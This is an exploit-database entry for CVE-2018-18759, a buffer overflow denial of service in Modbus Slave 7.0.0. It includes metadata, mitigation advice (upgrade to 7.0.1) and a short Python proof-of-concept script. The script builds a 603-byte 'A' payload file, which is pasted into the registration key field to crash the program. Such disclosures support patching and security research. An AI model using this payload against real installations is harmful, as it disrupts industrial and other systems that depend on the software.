Modbus Slave 7.0.0 - Denial of Service (PoC)

vendor:

Modbus Slave

by:

Ihsan Sencan

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Modbus Slave

Affected Version From: 7.0.0

Affected Version To: 7.0.0

Patch Exists: YES

Related CWE: CVE-2018-18759

CPE: a:modbustools:modbus_slave:7.0.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Modbus Slave 7.0.0 – Denial of Service (PoC)

A buffer overflow vulnerability exists in Modbus Slave 7.0.0 which could allow an attacker to cause a denial of service condition. An attacker can send a specially crafted request to the vulnerable application, which will cause a denial of service condition. This vulnerability is due to a lack of proper validation of user-supplied input when handling requests. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application.

Mitigation:

Upgrading to version 7.0.1 or later will address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.modbustools.com/
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe
# Version: 7.0.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18759

# POC: 
# 1)
# F3 & Connection / Connect / Registration Key

#!/usr/bin/python

buffer = "A" * 603
try:
    f=open("sie.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"